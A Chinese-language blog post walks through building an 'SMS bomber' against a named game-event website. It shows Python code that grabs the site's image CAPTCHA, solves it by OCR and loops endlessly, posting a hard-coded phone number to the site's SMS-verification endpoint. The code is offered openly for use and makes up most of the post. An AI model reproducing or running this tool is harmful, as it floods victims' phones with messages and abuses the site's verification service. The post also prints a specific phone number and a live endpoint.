前言
- 複習周閒來無事搶個鬼泣手遊內測資格,特喵的全國人搶100個資格,神一般的手速都搶不到。
- 重點來了,我發現這個網站登錄獲取驗證碼不需要等待時間,於是,一手F12,開始分析。
找思路
- 首先,打開network——>點擊登錄,找到獲取驗證碼圖片的接口,如下:
- 然後,填寫手機號,輸入驗證碼,點擊驗證,找到驗證輸入的驗證碼的接口,如下:
- 用PostMan對兩個接口請求一下,發現獲取驗證碼圖片的接口會攜帶一個Cookie,內容包含PHPSESSID,而上傳驗證碼的接口的Header中的Cookie正好需要一個PHPSESSID,拼接一下就OK。
- 有了圖片接口和驗證接口,那麼就可以白嫖了,白嫖驗證碼接口,嘿嘿嘿。但是這不是最終目的,最終目的是做短信轟炸機,既然是轟炸機,肯定不能自己輸入驗證碼,那樣效率太低了,讓機器自己識別驗證碼。這裏調用Python的圖片轉文字庫pytesseract,當然,更好的做法是調用百度API,後面可能會改進。
- 思路有了。
上代碼
def getImageAndCookie():
response = requests.session().get("http://dmc.yunchanggame.com/activity/public/verify/get_image")
if response.status_code == 200:
open("C:\\Users\\HP\\Desktop\\Test\\1.png",'wb').write(response.content)
mImage = Image.open("C:\\Users\\HP\\Desktop\\Test\\1.png")
mImage.show()
cookie = response.cookies.get_dict()
print("下載完成!得到cookie:"+cookie['PHPSESSID'])
return cookie['PHPSESSID'],mImage
else:
print("連接錯誤!")
def processing_image(mImage):
img = mImage.convert("L")
pixdata = img.load()
w, h = img.size
threshold = 160
for y in range(h):
for x in range(w):
if pixdata[x, y] < threshold:
pixdata[x, y] = 0
else:
pixdata[x, y] = 255
return img
def delete_spot(image):
images = processing_image(image)
data = images.getdata()
w, h = images.size
black_point = 0
for x in range(1, w - 1):
for y in range(1, h - 1):
mid_pixel = data[w * y + x]
if mid_pixel < 50:
top_pixel = data[w * (y - 1) + x]
left_pixel = data[w * y + (x - 1)]
down_pixel = data[w * (y + 1) + x]
right_pixel = data[w * y + (x + 1)]
if top_pixel < 10:
black_point += 1
if left_pixel < 10:
black_point += 1
if down_pixel < 10:
black_point += 1
if right_pixel < 10:
black_point += 1
if black_point < 1:
images.putpixel((x, y), 255)
black_point = 0
return images
def image_str(mImage):
image = delete_spot(mImage)
pytesseract.pytesseract.tesseract_cmd = r"C:\Program Files\Tesseract-OCR\tesseract.exe"
result = pytesseract.image_to_string(image)
resultj = re.sub(u"([^\u4e00-\u9fa5\u0030-\u0039\u0041-\u005a\u0061-\u007a])", "", result)
result_four = resultj[0:4]
mResult = ""
for i in result_four:
print(i)
mResult = mResult+i
return mResult
def InputYanzheng(Phone,code,Cookie):
url = "http://dmc.yunchanggame.com/activity/public/verify/get_sms"
mHeaders = {
"User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0",
"Cookie":"Hm_lvt_618160d195dc7579727a2a268f7791af=1592534551; Hm_lpvt_618160d195dc7579727a2a268f7791af=1592534710; Hm_lvt_d25a519a4cfe0e755bd071d9c200a580=1592534536; Hm_lpvt_d25a519a4cfe0e755bd071d9c200a580=1592534536; PHPSESSID="+Cookie+"; sid="
}
data = {
"image_code":code,
"phone":Phone
}
response = requests.post(url,data=data,headers=mHeaders).text
mRes = json.loads(response)
print(mRes['message'])
if __name__ == '__main__':
while True:
Cookie,mImage = getImageAndCookie()
Code = image_str(mImage)
InputYanzheng("18186156959",Code,Cookie)
import requests
import json
import re
from PIL import Image
import pytesseract
後記
- 驗證碼難於識別,所以較大機率會出現驗證碼爲空或驗證碼錯誤的情況,後續可能會更新百度API識別方法。
- 如有大佬發現文章錯誤,或代碼錯誤,煩請指正,感激不盡。
- 創作不易,轉載請註明出處,感謝。